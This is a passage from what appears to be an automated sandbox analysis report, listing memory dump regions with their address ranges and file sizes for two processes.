                                                                  736KB

                                                                • memory/1340-75-0x00007FFAB0770000-0x00007FFAB0AE5000-memory.dmp
                                                                  Filesize

                                                                  3.5MB

                                                                • memory/1340-76-0x0000026208740000-0x0000026208AB5000-memory.dmp
                                                                  Filesize

                                                                  3.5MB

                                                                • memory/1340-67-0x00007FFAC3350000-0x00007FFAC3369000-memory.dmp
                                                                  Filesize

                                                                  100KB

                                                                • memory/1340-68-0x00007FFAC3790000-0x00007FFAC379D000-memory.dmp
                                                                  Filesize

                                                                  52KB

                                                                • memory/1340-63-0x00007FFAC3370000-0x00007FFAC338F000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1340-64-0x00007FFAC0640000-0x00007FFAC07B1000-memory.dmp
                                                                  Filesize

                                                                  1.4MB

                                                                • memory/1340-60-0x00007FFAC4350000-0x00007FFAC4369000-memory.dmp
                                                                  Filesize

                                                                  100KB

                                                                • memory/1340-58-0x00007FFAC3680000-0x00007FFAC36AD000-memory.dmp
                                                                  Filesize

                                                                  180KB

                                                                • memory/1340-51-0x00007FFAC36B0000-0x00007FFAC36D4000-memory.dmp
                                                                  Filesize

                                                                  144KB

                                                                • memory/1340-85-0x00007FFAC36B0000-0x00007FFAC36D4000-memory.dmp
                                                                  Filesize

                                                                  144KB

                                                                • memory/1340-29-0x00007FFAB0AF0000-0x00007FFAB0F5E000-memory.dmp
                                                                  Filesize

                                                                  4.4MB

                                                                • memory/1340-528-0x00007FFAC3370000-0x00007FFAC338F000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1340-86-0x00007FFAC03E0000-0x00007FFAC04F8000-memory.dmp
                                                                  Filesize

                                                                  1.1MB

                                                                • memory/1340-540-0x00007FFAC3320000-0x00007FFAC334E000-memory.dmp
                                                                  Filesize

                                                                  184KB

                                                                • memory/1340-538-0x00007FFAC3350000-0x00007FFAC3369000-memory.dmp
                                                                  Filesize

                                                                  100KB

                                                                • memory/1340-532-0x00007FFAC36B0000-0x00007FFAC36D4000-memory.dmp
                                                                  Filesize

                                                                  144KB

                                                                • memory/1340-542-0x00007FFAB0770000-0x00007FFAB0AE5000-memory.dmp
                                                                  Filesize

                                                                  3.5MB

                                                                • memory/1340-541-0x00007FFAC0500000-0x00007FFAC05B8000-memory.dmp
                                                                  Filesize

                                                                  736KB

                                                                • memory/1340-531-0x00007FFAB0AF0000-0x00007FFAB0F5E000-memory.dmp
                                                                  Filesize

                                                                  4.4MB

                                                                • memory/1340-562-0x00007FFAC36B0000-0x00007FFAC36D4000-memory.dmp
                                                                  Filesize

                                                                  144KB

                                                                • memory/1340-571-0x00007FFAC0500000-0x00007FFAC05B8000-memory.dmp
                                                                  Filesize

                                                                  736KB

                                                                • memory/1340-574-0x00007FFAC03E0000-0x00007FFAC04F8000-memory.dmp
                                                                  Filesize

                                                                  1.1MB

                                                                • memory/1340-573-0x00007FFAC3240000-0x00007FFAC3254000-memory.dmp
                                                                  Filesize

                                                                  80KB

                                                                • memory/1340-572-0x00007FFAB0770000-0x00007FFAB0AE5000-memory.dmp
                                                                  Filesize

                                                                  3.5MB

                                                                • memory/1340-570-0x00007FFAC3320000-0x00007FFAC334E000-memory.dmp
                                                                  Filesize

                                                                  184KB

                                                                • memory/1340-569-0x00007FFAC0640000-0x00007FFAC07B1000-memory.dmp
                                                                  Filesize

                                                                  1.4MB

                                                                • memory/1340-568-0x00007FFAC3350000-0x00007FFAC3369000-memory.dmp
                                                                  Filesize

                                                                  100KB

                                                                • memory/1340-567-0x00007FFAC3230000-0x00007FFAC323D000-memory.dmp
                                                                  Filesize

                                                                  52KB

                                                                • memory/1340-566-0x00007FFAC3370000-0x00007FFAC338F000-memory.dmp
                                                                  Filesize

                                                                  124KB

                                                                • memory/1340-565-0x00007FFAC4350000-0x00007FFAC4369000-memory.dmp
                                                                  Filesize

                                                                  100KB

                                                                • memory/1340-564-0x00007FFAC3680000-0x00007FFAC36AD000-memory.dmp
                                                                  Filesize

                                                                  180KB

                                                                • memory/1340-563-0x00007FFAC4BD0000-0x00007FFAC4BDF000-memory.dmp
                                                                  Filesize

                                                                  60KB

                                                                • memory/1340-561-0x00007FFAC3790000-0x00007FFAC379D000-memory.dmp
                                                                  Filesize

                                                                  52KB

                                                                • memory/2912-383-0x0000024CC6B70000-0x0000024CC6B78000-memory.dmp
                                                                  Filesize

                                                                  32KB